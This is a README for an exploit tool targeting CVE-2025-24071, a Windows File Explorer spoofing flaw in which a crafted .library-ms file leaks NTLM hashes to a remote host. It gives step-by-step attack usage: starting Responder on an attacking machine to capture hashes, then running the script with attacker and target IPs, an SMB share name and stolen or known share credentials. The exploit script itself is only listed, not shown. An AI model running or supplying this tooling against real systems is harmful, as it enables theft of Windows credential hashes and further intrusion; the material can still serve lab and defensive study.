Python script to execute CVE-2025-24071# CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability (script by SilentExploit)
## 📖 Description
This project detects and demonstrates exploitation of a **Windows File Explorer spoofing vulnerability**.
The issue arises from a **Windows library file (`.library-ms`)** containing a network path, either as a direct attachment or embedded in an archive.
When opened, the file can cause Windows to **leak NTLM hashes** to a remote (potentially malicious) network location.
POC: https://imgur.com/a/hEO83Se
---
## ⚡ Usage
### 1. Start Responder
On your attacking machine, run Responder to capture NTLM hashes:
```bash
sudo responder -I tun0 -wvF
```
2. Run the Script
You can configure the script in two ways:
✅ Option A: Edit defaults (easiest)
Modify the default parameters in the script directly.
```bash
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP") #your IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP") #target IP
parser.add_argument("--share-name", default="IT", help="SMB share name") #name of the share you have access to without the /
parser.add_argument("--username", default="USERNAME", help="SMB username") #username of the share owner
parser.add_argument("--password", default="PASSWORD", help="SMB password") #password of the share owner
parser.add_argument("--interface", default="tun0", help="Responder network interface") #check ifconfig but tun0 will work if you're on a vpn
return parser.parse_args()
```
✅ Option B: Run with CLI parameters
Execute with arguments:
```bash
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>
```
[4.0K] /data/pocs/63392f46dd6c08634b480663ec0b75857d20b938
├── [3.9K] cve-2025-24071-exploit.py
└── [1.9K] README.md
0 directories, 2 files